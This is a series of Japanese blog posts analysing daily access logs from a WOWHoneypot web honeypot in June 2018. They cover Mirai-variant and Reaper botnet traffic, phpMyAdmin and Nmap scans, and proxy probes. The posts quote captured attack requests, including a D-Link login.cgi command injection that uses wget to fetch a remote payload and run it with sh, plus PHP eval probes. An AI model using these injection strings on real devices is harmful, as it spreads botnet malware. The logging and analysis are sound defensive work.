S-Owl

S(ecurity)Owl

WOWHonypot簡易分析(18日目)

WOWhonypotの2018/6/21(木)(運用18日目)の簡易分析です。

 

本日の総アクセスログは213件です。

件数 日付 メソッド パス

153 2018-06-21 POST /command.php
39 2018-06-21 GET /
11 2018-06-21 HEAD /
1 2018-06-21 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://217.61.6[.]127/t%20-O%20-%3E%20/tmp/t;sh%20/tmp/t%27$
1 2018-06-21 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$
1 2018-06-21 GET /phpMyAdmin/scripts/setup.php

1 2018-06-21 GET /manager/html
1 2018-06-21 GET /stssys.htm
1 2018-06-21 GET /cgi/common.cgi
1 2018-06-21 GET /xxbb
1 2018-06-21 GET /ccvv
1 2018-06-21 GET hxxp://httpheader[.]net/
1 2018-06-21 GET hxxp://114.215.240[.]151:83/index.php

本日はだいぶ傾向が変わりました。

1. Reaper

同一IPから連続して/command.phpに対しPOSTが投げられています。これは5日目、11日目にも来ていたReaper というIoTボットネット/マルウェアが対象としている D-Link DIR-600とDIR-300 への攻撃と思われます。アクセス件数も同じです。
同一IPからのアクセスの流れは以下になります。GETで存在調査をした後exploitが実行されます。ハニポが200 OKを返している事によりうまく拾えているものですね。

GET /cgi/common.cgi
GET /stssys.htm
GET /
POST /command.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Wget(linux)
Content-Length: 208

cmd=cd /var/tmp && echo -ne \\x3610cker > 610cker.txt && cat 610cker.txt

2. Mirai亜種Satori/Shinoa

1件→8件→33件→16件→5件→5件→2件と数はだいぶ少なくなりました。何かISP等で対策され少なくなったのでしょうか。
ただし、世間的には前日からの傾向ですが、取得先IPが変化したものが出ているのも気になります。どちらも同じく「User-Agent: Hello, World」のため同一の攻撃と思われます。

GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://217.61.6[.]127/t%20-O%20-%3E%20/tmp/t;sh%20/tmp/t%27$
GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$

3. パスにURLを入れた通信

パスにURLを入れることで、うまく処理していない場合に該当URLへアクセスが発生すると思われ、そういったサイトを調査しているものと思われます。

GET hxxp://httpheader[.]net/

表示される画像を見ると、httpヘッダが表示されるようです。

Free Automated Malware Analysis Service - powered by Falcon Sandbox - Viewing online file analysis results for 'http://httpheader.net/'

GET hxxp://114.215.240[.]151:83/index.php 

Free Automated Malware Analysis Service - powered by Falcon Sandbox - Viewing online file analysis results for 'http://114.215.240.151:83/index.php'

 4. その他既知のもの

GET /phpMyAdmin/scripts/setup.php → phpMyAdmin
GET /manager/html →Tomcatの管理ページが存在するかの調査
GET /xxbb →スキャンツールzgrabを使ったスキャン(詳細不明)
GET /ccvv →上記とセットで同じIPからくるスキャン(詳細不明)

 

ハンティングログは以下です。Mirai亜種のみです。

1 [2018-06-21 wget hxxp://217.61.6.127/t
1 [2018-06-21 wget hxxp://185.62.190.191/r

 この設定の強化もしたいところですが…。

 

以上です。

WOWHonypot簡易分析(17日目)

WOWhonypotの2018/6/20(水)(運用17日目)の簡易分析です。

 

本日の総アクセスログは246件です。

$ awk '/06-20/{print $1,$5,$6}' access_log | sort | uniq -c | sort -nr
54 [2018-06-20 "GET /
9 [2018-06-20 "HEAD /
5 [2018-06-20 "GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$
4 [2018-06-20 "GET /www/phpMyAdmin/index.php
4 [2018-06-20 "GET /web/phpMyAdmin/index.php
4 [2018-06-20 "GET /typo3/phpmyadmin/index.php
4 [2018-06-20 "GET /tools/phpMyAdmin/index.php
4 [2018-06-20 "GET /pmd/index.php
4 [2018-06-20 "GET /pma-old/index.php
4 [2018-06-20 "GET /pmamy/index.php
4 [2018-06-20 "GET /pmamy2/index.php
4 [2018-06-20 "GET /PMA/index.php
4 [2018-06-20 "GET /pma/index.php
4 [2018-06-20 "GET /PMA2/index.php
4 [2018-06-20 "GET /phpMyAdminold/index.php
4 [2018-06-20 "GET /phpMyAdmin.old/index.php
4 [2018-06-20 "GET /phpmyadmin-old/index.php
4 [2018-06-20 "GET /phpMyAdmin/index.php
4 [2018-06-20 "GET /phpmyadmin/index.php
4 [2018-06-20 "GET /phpMyadmin_bak/index.php
4 [2018-06-20 "GET /phpmyadmin2/index.php
4 [2018-06-20 "GET /phpmyadmin1/index.php
4 [2018-06-20 "GET /phpmyadmin0/index.php
4 [2018-06-20 "GET /phpadmin/index.php
4 [2018-06-20 "GET /mysql/index.php
4 [2018-06-20 "GET /mysqladmin/index.php
4 [2018-06-20 "GET /mysql-admin/index.php
4 [2018-06-20 "GET /myadmin/index.php
4 [2018-06-20 "GET /myadmin2/index.php
4 [2018-06-20 "GET /index.php
4 [2018-06-20 "GET /db/index.php
4 [2018-06-20 "GET /claroline/phpMyAdmin/index.php
4 [2018-06-20 "GET /admin/PMA/index.php
4 [2018-06-20 "GET /admin/pma/index.php
4 [2018-06-20 "GET /admin/phpMyAdmin/index.php
4 [2018-06-20 "GET /admin/phpmyadmin/index.php
4 [2018-06-20 "GET /admin/phpmyadmin2/index.php
4 [2018-06-20 "GET /admin/mysql/index.php
4 [2018-06-20 "GET /admin/mysql2/index.php
4 [2018-06-20 "GET /admin/index.php
3 [2018-06-20 "GET /dbadmin/index.php
2 [2018-06-20 "GET /xampp/phpmyadmin/index.php
2 [2018-06-20 "GET /phpMyAdmin/phpMyAdmin/index.php
2 [2018-06-20 "GET /phpmyadmin/phpmyadmin/index.php
2 [2018-06-20 "GET /phpma/index.php
2 [2018-06-20 "CONNECT 133.130.126[.]119:43
1 [2018-06-20 "PROPFIND /
1 [2018-06-20 "POST /xx.php
1 [2018-06-20 "POST /xw.php
1 [2018-06-20 "POST /wuwu11.php
1 [2018-06-20 "POST /w.php
1 [2018-06-20 "POST /s.php
1 [2018-06-20 "POST /sheep.php
1 [2018-06-20 "POST /sdk
1 [2018-06-20 "POST /db_session.init.php
1 [2018-06-20 "POST /db.init.php
1 [2018-06-20 "GET /phpmyadmin/scripts/setup.php
1 [2018-06-20 "GET /NmapUpperCheck1529497937
1 [2018-06-20 "GET /nmaplowercheck1529497937
1 [2018-06-20 "GET /Nmap/folder/check1529497937
1 [2018-06-20 "GET /manager/html
1 [2018-06-20 "GET /idman630build10.exe
1 [2018-06-20 "GET /database.rar

例によってPhpMyAdmin関係(160件)や/を除外します。既知のアクセスは青字にします。

5 [2018-06-20 "GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$
2 [2018-06-20 "CONNECT 133.130.126.119:43
1 [2018-06-20 "POST /xx.php
1 [2018-06-20 "POST /xw.php
1 [2018-06-20 "POST /wuwu11.php
1 [2018-06-20 "POST /w.php
1 [2018-06-20 "POST /s.php
1 [2018-06-20 "POST /sheep.php
1 [2018-06-20 "POST /db.init.php
1 [2018-06-20 "POST /db_session.init.php
1 [2018-06-20 "GET /manager/html
1 [2018-06-20 "POST /sdk
1 [2018-06-20 "GET /NmapUpperCheck1529497937
1 [2018-06-20 "GET /nmaplowercheck1529497937
1 [2018-06-20 "GET /Nmap/folder/check1529497937
1 [2018-06-20 "GET /idman630build10.exe
1 [2018-06-20 "GET /database.rar

1.D-Linkの脆弱性を突くMirai亜種shinoa

5 [2018-06-20 "GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$

当初は大量流行するかと思っていましたが、1件→8件→33件→16件→5件→5件と落ち着いています。
なお、うちには来ていませんが、新しく以下のパターンも出ているようです。

/login.cgi?cli=aa%20aa%27;wget%20hxxp://217.61.6[.]127/t%20-O%20-%3E%20/tmp/t;sh%20/tmp/t%27$

 2.Nmap関連

User-AgentにNmap Scripting Engineと出ているものはNmapというポートスキャン用のツールで80ポートをスキャンした際に残るログです。

POST /sdk HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
Content-Length: 441
Connection: close

<soap:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Header><operationID>00000001-00000001</operationID></soap:Header><soap:Body><RetrieveServiceContent xmlns="urn:internalvim25"><_this xsi:type="ManagedObjectReference" type="ServiceInstance">ServiceInstance</_this></RetrieveServiceContent></soap:Body></soap:Envelope>

GET /NmapUpperCheck1529497937 HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
Connection: close

GET /nmaplowercheck1529497937 HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
Connection: close

 GET /Nmap/folder/check1529497937 HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
Connection: close

NmapUpperCheckで調べると、以下のサイトが出てきました。

Nmap Development: NSE: http.identify_404 follows redirects

nmap/http.lua at master · nmap/nmap · GitHub

Nmapのスクリプトでわざと存在しないページにアクセスし404ページを表示させる為のスクリプトのようです。

おそらく、404ページの表示の仕方で使っているミドルウェアを判定するためかと思われます。

3. exeファイル、rarファイルへのアクセス

どちらも当然置いてないファイルです。どちらも同一IPからはこの1件のみのアクセスでした。

GET /idman630build10.exe HTTP/1.1
User-Agent: Mozilla/5.0
Connection: close

調査すると、以下のファイルが引っかかりました。

Download Internet Download Manager: high speed download accelerator

Free Automated Malware Analysis Service - powered by Falcon Sandbox - Viewing online file analysis results for 'idman630build10.exe'

GET /database.rar HTTP/1.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0

 調査すると、以下のファイルが引っかかりました。 

/Database.rarをダウンロード - Security System using ANPR - OSDN

どちらも、何故アクセスがあったのか不明なものです。

他でダウンロード可能なものをあえて探しているように見えますが、意図がわからないアクセスです。

 

本日のハンティングログです。Mirai亜種のみです。

$ awk '/06-20/{print $1,substr($0,index($0,$4))}' hunting.log | sort | uniq -c | sort -nr
5 [2018-06-20 wget hxxp://185.62.190[.]191/r

 

以上です。

WOWHonypot簡易分析(16日目)

WOWhonypotの2018/6/19(火)(運用16日目)の簡易分析です。

 

本日の総アクセスログは176件です。少ない日ですね。

$ awk '/06-19/{print $1,$5,$6}' access_log | sort | uniq -c | sort -nr
52 [2018-06-19 "GET /
11 [2018-06-19 "HEAD /
5 [2018-06-19 "GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$
4 [2018-06-19 "GET /index.action
2 [2018-06-19 "POST /HNAP1/
2 [2018-06-19 "POST /getcfg.php
2 [2018-06-19 "GET /xampp/phpmyadmin/index.php
2 [2018-06-19 "GET /www/phpMyAdmin/index.php
2 [2018-06-19 "GET /typo3/phpmyadmin/index.php
2 [2018-06-19 "GET /tools/phpMyAdmin/index.php
2 [2018-06-19 "GET /pmd/index.php
2 [2018-06-19 "GET /pma-old/index.php
2 [2018-06-19 "GET /pmamy/index.php
2 [2018-06-19 "GET /pmamy2/index.php
2 [2018-06-19 "GET /PMA/index.php
2 [2018-06-19 "GET /pma/index.php
2 [2018-06-19 "GET /PMA2/index.php
2 [2018-06-19 "GET /phpMyAdmin/phpMyAdmin/index.php
2 [2018-06-19 "GET /phpmyadmin/phpmyadmin/index.php
2 [2018-06-19 "GET /phpMyAdminold/index.php
2 [2018-06-19 "GET /phpMyAdmin.old/index.php
2 [2018-06-19 "GET /phpmyadmin-old/index.php
2 [2018-06-19 "GET /phpMyAdmin/index.php
2 [2018-06-19 "GET /phpmyadmin/index.php
2 [2018-06-19 "GET /phpmyadmin2/index.php
2 [2018-06-19 "GET /phpmyadmin1/index.php
2 [2018-06-19 "GET /phpmyadmin0/index.php
2 [2018-06-19 "GET /phpadmin/index.php
2 [2018-06-19 "GET /mysqladmin/index.php
2 [2018-06-19 "GET /mysql-admin/index.php
2 [2018-06-19 "GET /myadmin/index.php
2 [2018-06-19 "GET /myadmin2/index.php
2 [2018-06-19 "GET /index.php
2 [2018-06-19 "GET /db/index.php
2 [2018-06-19 "GET /dbadmin/index.php
2 [2018-06-19 "GET /claroline/phpMyAdmin/index.php
2 [2018-06-19 "GET /authentication.cgi?captcha=&dummy=0000000000000
2 [2018-06-19 "GET /admin/pma/index.php
2 [2018-06-19 "GET /admin/phpMyAdmin/index.php
2 [2018-06-19 "GET /admin/phpmyadmin/index.php
2 [2018-06-19 "GET /admin/phpmyadmin2/index.php
2 [2018-06-19 "GET /admin/mysql/index.php
2 [2018-06-19 "GET /admin/mysql2/index.php
2 [2018-06-19 "GET /admin/index.php
1 [2018-06-19 "PROPFIND /
1 [2018-06-19 "POST /xx.php
1 [2018-06-19 "POST /xw.php
1 [2018-06-19 "POST /wuwu11.php
1 [2018-06-19 "POST /w.php
1 [2018-06-19 "POST /s.php
1 [2018-06-19 "POST /sheep.php
1 [2018-06-19 "POST /hndUnblock.cgi
1 [2018-06-19 "POST /db_session.init.php
1 [2018-06-19 "POST /db.init.php
1 [2018-06-19 "GET /webfig/roteros.info
1 [2018-06-19 "GET /sitemap.xml
1 [2018-06-19 "GET /robots.txt
1 [2018-06-19 "GET /phpmyadmin/scripts/db_documentation.init.php
1 [2018-06-19 "GET /phpMyadmin_bak/index.php
1 [2018-06-19 "GET /moo
1 [2018-06-19 "GET /manager/html
1 [2018-06-19 "GET hxxp://www.ip[.]cn/
1 [2018-06-19 "GET hxxp://www.123cha[.]com/
1 [2018-06-19 "GET /hndUnblock.cgi
1 [2018-06-19 "GET /favicon.ico
1 [2018-06-19 "CONNECT www.baidu.com:443
1 [2018-06-19 "CONNECT cn.bing.com:443
1 [2018-06-19 "CONNECT 133.130.126.119:43

種類が多いです。/とindex.phpを除外します。

5 [2018-06-19 "GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$
4 [2018-06-19 "GET /index.action
2 [2018-06-19 "POST /HNAP1/
2 [2018-06-19 "POST /getcfg.php
2 [2018-06-19 "GET /authentication.cgi?captcha=&dummy=0000000000000
1 [2018-06-19 "POST /xx.php
1 [2018-06-19 "POST /xw.php
1 [2018-06-19 "POST /wuwu11.php
1 [2018-06-19 "POST /w.php
1 [2018-06-19 "POST /s.php
1 [2018-06-19 "POST /sheep.php
1 [2018-06-19 "POST /hndUnblock.cgi
1 [2018-06-19 "POST /db_session.init.php
1 [2018-06-19 "POST /db.init.php
1 [2018-06-19 "GET /webfig/roteros.info
1 [2018-06-19 "GET /sitemap.xml
1 [2018-06-19 "GET /robots.txt
1 [2018-06-19 "GET /moo
1 [2018-06-19 "GET /manager/html
1 [2018-06-19 "GET hxxp://www.ip[.]cn/
1 [2018-06-19 "GET hxxp://www.123cha[.]com/
1 [2018-06-19 "GET /hndUnblock.cgi
1 [2018-06-19 "GET /favicon.ico
1 [2018-06-19 "CONNECT www.baidu.com:443
1 [2018-06-19 "CONNECT cn.bing.com:443
1 [2018-06-19 "CONNECT 133.130.126.119:43

数が多くて時間がないので、気になったもの(赤字)だけピックアップします。青字は既に分析済のものです。

1.D-Linkの脆弱性を突くMirai亜種

5 [2018-06-19 "GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$

1件→8件→33件→16件→5件と推移しています。少し落ち着きつつあるようです。

2. POST通信

POST /db_session.init.php HTTP/1.1
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 32

eval=die( (string)(111111111*9) );

phpに対してPOSTしているものということで、何を狙っているかは不明ですが、前日に来ていたものと同種のもののようです。

3.CONNECTメソッド

CONNECT 133.130.126[.]119:43 HTTP/1.1
HOST: 133.130.126[.]119
User-Agent: RPS/HTTP PROXY

CONNECT www.baidu[.]com:443 HTTP/1.1
Host: www.baidu.com:443
Proxy-Authorization: Basic Og==
User-Agent: PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3
Proxy-Connection: Keep-Alive

CONNECT cn.bing[.]com:443 HTTP/1.1
Host: cn.bing[.]com:443
Proxy-Authorization: Basic Og==
User-Agent: PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3
Proxy-Connection: Keep-Alive

CONNECTメソッドを利用した不正中継の調査と思われます。

4.調査行為

UAWgetだったり受入言語がidentityだったりですが、特段怪しいところもなく、調査行為可と思います。

GET /webfig/roteros.info HTTP/1.1
Accept: */*
Connection: close
User-Agent: Wget(linux)

GET /moo HTTP/1.1
Accept: */*
User-Agent: Wget(linux)

GET /sitemap.xml HTTP/1.1
Accept-Encoding: identity

GET /robots.txt HTTP/1.1
Accept-Encoding: identity

 

ハンティングログは以下です。

$ awk '/06-19/{print $1,substr($0,index($0,$4))}' /var/log/wowhoneypot/hunting.log | sort | uniq -c | sort -nr
5 [2018-06-19 wget hxxp://185.62.190[.]191/r
1 [2018-06-19 wget -P /tmp hxxp://hfs.mhacker[.]cc:9278/Linux.server
1 [2018-06-19 wget -O nmlt1.sh hxxp://domstates[.]su/nmlt1.sh
1 [2018-06-19 wget -c hxxp://aaa.linuxa[.]club:57843/linux
1 [2018-06-19 wget -c hxxp://60.250.99[.]131:9998/liux

 

以上です。

WOWHonypot簡易分析(15日目)

WOWhonypotの2018/6/18(月)(運用15日目)の簡易分析です。

 

本日の総アクセスは254件です。

$ awk '/06-18/{print $1,$5,$6}' /var/log/wowhoneypot/access_log* | sort | uniq -c | sort -nr
67 [2018-06-18 "GET /
25 [2018-06-18 "HEAD /
16 [2018-06-18 "GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$
5 [2018-06-18 "GET /pmamy/index.php
5 [2018-06-18 "GET /pmamy2/index.php
5 [2018-06-18 "GET /PMA/index.php
5 [2018-06-18 "GET /phpMyAdmin/index.php
4 [2018-06-18 "GET /xampp/phpmyadmin/index.php
4 [2018-06-18 "GET /www/phpMyAdmin/index.php
4 [2018-06-18 "GET /web/phpMyAdmin/index.php
4 [2018-06-18 "GET /phpmyadmin/phpmyadmin/index.php
4 [2018-06-18 "GET /phpMyAdmin.old/index.php
4 [2018-06-18 "GET /phpmyadmin1/index.php
4 [2018-06-18 "GET /phpma/index.php
4 [2018-06-18 "GET /mysql/index.php
4 [2018-06-18 "GET /mysql-admin/index.php
4 [2018-06-18 "GET /myadmin/index.php
4 [2018-06-18 "GET /index.php
4 [2018-06-18 "GET /db/index.php
4 [2018-06-18 "GET /admin/PMA/index.php
4 [2018-06-18 "GET /admin/phpmyadmin/index.php
4 [2018-06-18 "GET /admin/phpmyadmin2/index.php
4 [2018-06-18 "GET /admin/mysql/index.php
3 [2018-06-18 "GET /typo3/phpmyadmin/index.php
3 [2018-06-18 "GET /tools/phpMyAdmin/index.php
3 [2018-06-18 "GET /pmd/index.php
3 [2018-06-18 "GET /pma-old/index.php
3 [2018-06-18 "GET /pma/index.php
3 [2018-06-18 "GET /PMA2/index.php
3 [2018-06-18 "GET /phpMyAdmin/phpMyAdmin/index.php
3 [2018-06-18 "GET /phpmyadmin-old/index.php
3 [2018-06-18 "GET /phpMyadmin_bak/index.php
3 [2018-06-18 "GET /myadmin2/index.php
3 [2018-06-18 "GET /admin/phpMyAdmin/index.php
2 [2018-06-18 "PROPFIND /
2 [2018-06-18 "GET /phpMyAdminold/index.php
2 [2018-06-18 "GET /phpmyadmin/index.php
2 [2018-06-18 "GET /phpmyadmin2/index.php
2 [2018-06-18 "GET /phpmyadmin0/index.php
2 [2018-06-18 "GET /phpadmin/index.php
2 [2018-06-18 "GET /mysqladmin/index.php
2 [2018-06-18 "GET /dbadmin/index.php
2 [2018-06-18 "GET /claroline/phpMyAdmin/index.php
2 [2018-06-18 "GET /admin/mysql2/index.php
2 [2018-06-18 "GET /admin/index.php
1 [2018-06-18 "POST /xx.php
1 [2018-06-18 "POST /xw.php
1 [2018-06-18 "POST /wuwu11.php
1 [2018-06-18 "POST /w.php
1 [2018-06-18 "POST /sheep.php
1 [2018-06-18 "POST /db.init.php
1 [2018-06-18 "GET /phpmyadmin/scripts/db_setup.init.php

いつものようにPhpMyAdmin関連を除外します(138件)。ついでに/へのアクセスも除外します。

16 [2018-06-18 "GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$
1 [2018-06-18 "POST /xx.php
1 [2018-06-18 "POST /xw.php
1 [2018-06-18 "POST /wuwu11.php
1 [2018-06-18 "POST /w.php
1 [2018-06-18 "POST /sheep.php
1 [2018-06-18 "POST /db.init.php

見るべきログは2種類になりました。どちらも前日も来ていたものです。

 

1.D-Linkの脆弱性を突くMirai亜種

16 [2018-06-18 "GET /login.cgi?cli=aa aa';wget hxxp://185.62.190[.]191/r -O -> /tmp/r;sh /tmp/r'$
Host: 127.0.0.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World

6/15(金)からアクセスが始まったコレですが、1件→8件→33件→16件と推移しています。
前日までの傾向からして、世間的に in the wild かと思いましたが、更に増えるということにはなかったようです。
とはいえアクセス件数は多い状態と思われます。この記事を書いてからこのblogのアクセス件数も多い気がします。

このアクセスですが、以下の記事よりアクセスパス及びクエリが合致しているため、D-Link DSL-2750Bの脆弱性を突くと推測しています。

D-Link DSL-2750B - OS Command Injection (Metasploit)

Botnets never Die, Satori REFUSES to Fade Away

このマルウェアの感染はMiraiのようにtelnet/sshへの辞書攻撃による不正ログインではなく、脆弱性をついた攻撃により感染を広げるようです。

取得するマルウェアをHybridAnalysisで解析すると、上記記事と同様にbotnetのマルウェアを取得します。

Free Automated Malware Analysis Service - powered by Falcon Sandbox - Viewing online file analysis results for 'r'

80/tcpは閉じることのできないポートのため、こういったアクセスを遮断するには、IPSでシグネチャを作って遮断するしかないかと思います。

 

2.POST通信

アクセス内容は前日と同様です。phpに対してのPOSTでstring型に大きな値を入力しようとしているように思えるのでDoSでしょうか。

POST /wuwu11.php HTTP/1.1
POST /xw.php HTTP/1.1
POST /xx.php HTTP/1.1
POST /s.php HTTP/1.1
POST /w.php HTTP/1.1
POST /db.init.php HTTP/1.1
POST /sheep.php HTTP/1.1

User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

h=die( (string)(111111111*9) );
h=die( (string)(111111111*9) );
axa=die( (string)(111111111*9) );
leng=die( (string)(111111111*9) );
leng=die( (string)(111111111*9) );
eval=die( (string)(111111111*9) );

 

本日のハンティングログは以下です。

$ awk '/06-18/{print $1,substr($0,index($0,$4))}' /var/log/wowhoneypot/hunting.log | sort | uniq -c | sort -nr
16 [2018-06-18 wget hxxp://185.62.190[.]191/r

 

以上です。

WOWHonypot簡易分析(14日目)

WOWhonypotの2018/6/17(日)(運用14日目)の簡易分析です。

本日の総アクセス数は126件です。だいぶ落ち着きました。

50 [2018-06-17 "GET /
33 [2018-06-17 "GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$
30 [2018-06-17 "HEAD /
1 [2018-06-17 "PROPFIND /
1 [2018-06-17 "POST /xx.php
1 [2018-06-17 "POST /xw.php
1 [2018-06-17 "POST /wuwu11.php
1 [2018-06-17 "POST /w.php
1 [2018-06-17 "POST /s.php
1 [2018-06-17 "POST /sheep.php
1 [2018-06-17 "POST /db.init.php
1 [2018-06-17 "GET /x
1 [2018-06-17 "GET /manager/html
1 [2018-06-17 "GET /index.php
1 [2018-06-17 "GET /iem/admin/index.php
1 [2018-06-17 "GET /admin/index.php

D-Linkの脆弱性を突く攻撃は日毎に件数が増加しています。(1件→8件→33件)

幾つかPOSTしているログがあるので、それを見てみます。

POST /wuwu11.php HTTP/1.1
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

h=die*1;

POST /xw.php HTTP/1.1
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

h=die*2;

POST /xx.php HTTP/1.1
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 31

axa=die*3;

POST /s.php HTTP/1.1
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 32

leng=die*4;

POST /w.php HTTP/1.1
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 32

leng=die*5;

POST /db.init.php HTTP/1.1
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 32

eval=die*6;

POST /sheep.php HTTP/1.1
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

m=die*7

7種類ありますが、どれもペイロードの中身はほぼ同じため、同じ目的の攻撃と思われます。

推測ですが、何らかのWebShellが埋め込まれているかの確認?という気がします。

それ以外のアクセスログTomcatphpMyAdminに関連するパスへのアクセスで、使用有無の調査行為と思われます。

 

ハンティングログは以下です。

33 [2018-06-17 wget hxxp://185.62.190[.]191/r

 

以上です。

*1:string)(111111111*9

*2:string)(111111111*9

*3:string)(111111111*9

*4:string)(111111111*9

*5:string)(111111111*9

*6:string)(111111111*9

*7:string)(111111111*9

WOWHonypot簡易分析(13日目)

WOWhonypotの2018/6/15(土)(運用13日目)の簡易分析です。

本日の総アクセス数は435件です。また平時の2倍近いアクセス数がありました。
これだけ多いと分析が大変ですが、ちょっとワクワクしますね。

awk '/06-16/{print $1,$5,$6}' access_log | sort | uniq -c | sort -nr
78 [2018-06-16 "GET /
39 [2018-06-16 "HEAD /
21 [2018-06-16 "GET /index.action
8 [2018-06-16 "GET /mysql-admin/index.php
8 [2018-06-16 "GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$
7 [2018-06-16 "GET /tools/phpMyAdmin/index.php
7 [2018-06-16 "GET /pmd/index.php
7 [2018-06-16 "GET /pma-old/index.php
7 [2018-06-16 "GET /pmamy/index.php
7 [2018-06-16 "GET /pmamy2/index.php
7 [2018-06-16 "GET /pma/index.php
7 [2018-06-16 "GET /phpmyadmin/index.php
7 [2018-06-16 "GET /mysql/index.php
7 [2018-06-16 "GET /index.php
7 [2018-06-16 "GET /db/index.php
7 [2018-06-16 "GET /dbadmin/index.php
7 [2018-06-16 "GET /claroline/phpMyAdmin/index.php
7 [2018-06-16 "GET /admin/mysql/index.php
7 [2018-06-16 "GET /admin/mysql2/index.php
6 [2018-06-16 "GET /xampp/phpmyadmin/index.php
6 [2018-06-16 "GET /www/phpMyAdmin/index.php
6 [2018-06-16 "GET /typo3/phpmyadmin/index.php
6 [2018-06-16 "GET /PMA/index.php
6 [2018-06-16 "GET /PMA2/index.php
6 [2018-06-16 "GET /phpMyAdmin/phpMyAdmin/index.php
6 [2018-06-16 "GET /phpmyadmin/phpmyadmin/index.php
6 [2018-06-16 "GET /phpMyAdminold/index.php
6 [2018-06-16 "GET /phpMyAdmin.old/index.php
6 [2018-06-16 "GET /phpmyadmin-old/index.php
6 [2018-06-16 "GET /phpMyAdmin/index.php
6 [2018-06-16 "GET /phpMyadmin_bak/index.php
6 [2018-06-16 "GET /phpmyadmin2/index.php
6 [2018-06-16 "GET /phpmyadmin1/index.php
6 [2018-06-16 "GET /phpma/index.php
6 [2018-06-16 "GET /phpadmin/index.php
6 [2018-06-16 "GET /mysqladmin/index.php
6 [2018-06-16 "GET /myadmin/index.php
6 [2018-06-16 "GET /myadmin2/index.php
6 [2018-06-16 "GET /admin/PMA/index.php
6 [2018-06-16 "GET /admin/pma/index.php
6 [2018-06-16 "GET /admin/phpMyAdmin/index.php
6 [2018-06-16 "GET /admin/phpmyadmin/index.php
6 [2018-06-16 "GET /admin/phpmyadmin2/index.php
6 [2018-06-16 "GET /admin/index.php
5 [2018-06-16 "GET /phpmyadmin0/index.php
4 [2018-06-16 "PROPFIND /
4 [2018-06-16 "GET /web/phpMyAdmin/index.php
1 [2018-06-16 "POST /wls-wsat/CoordinatorPortType
1 [2018-06-16 "GET /xxbb
1 [2018-06-16 "GET /w00tw00t.at.blackhats.romanian.anti-sec:)
1 [2018-06-16 "GET /pma/scripts/setup.php
1 [2018-06-16 "GET /phpMyAdmin/scripts/setup.php
1 [2018-06-16 "GET /phpmyadmin/scripts/setup.php
1 [2018-06-16 "GET /MyAdmin/scripts/setup.php
1 [2018-06-16 "GET /myadmin/scripts/setup.php
1 [2018-06-16 "GET /main.jsp
1 [2018-06-16 "GET /main.do
1 [2018-06-16 "GET /login.do
1 [2018-06-16 "GET /login.action
1 [2018-06-16 "GET /index.jsp
1 [2018-06-16 "GET /index.html
1 [2018-06-16 "GET /index.htm
1 [2018-06-16 "GET /index.do
1 [2018-06-16 "GET hxxp://httpheader[.]net/
1 [2018-06-16 "GET /home.jsp
1 [2018-06-16 "GET /home.do
1 [2018-06-16 "GET /ccvv

